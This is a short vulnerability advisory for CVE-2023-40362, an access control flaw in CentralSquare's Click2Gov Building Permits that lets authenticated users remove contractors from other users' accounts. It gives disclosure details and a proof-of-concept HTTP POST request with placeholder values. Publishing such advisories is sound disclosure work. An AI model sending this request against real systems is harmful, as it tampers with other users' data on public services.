CVE-2023-40362 vulnerabilitiy details and proof-of-concept.
An access control vulnerability in Click2Gov BP at the URI /Click2GovBP/mastercontractorlist.html
leads to the ability for authenticated users to delete the
contractors from the accounts of other users with the victim's user ID and the information of the contractor to delete.
This is caused by a failure of the web application to verify that the user is authorized to delete the contractor from the account of which the user ID is specified.
Vendor: CentralSquare
Reported By: Ally Petitt
Discovered: June 13, 2023
Affected Products: Click2Gov Building Permits (BP)
Affected Releases: Before October 2023
CVSS v3: 5.4 - Moderate (AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L)
The HTTP POST request shown below can be made in order to delete a contractor from a victim's account. The CSRF token must be valid for this to work.
POST /Click2GovBP/mastercontractorlist.html HTTP/1.1
Host: <HOST>
Cookie: welcome=true; JSESSIONID=<SESSION_ID>;
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: <USER_AGENT>
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
contractorList%5B0%5D.number=<CONTRACTOR_NUMBER>&contractorList%5B0%5D.type=<CONTRACTOR_TYPE>&contractorList%5B0%5D.name=<CONTRACTOR_NAME>&submitRemoveContractor=true&confirmRemoveContractor=true&userId=<USER_ID>&OWASP_CSRFTOKEN=<CSRF_TOKEN>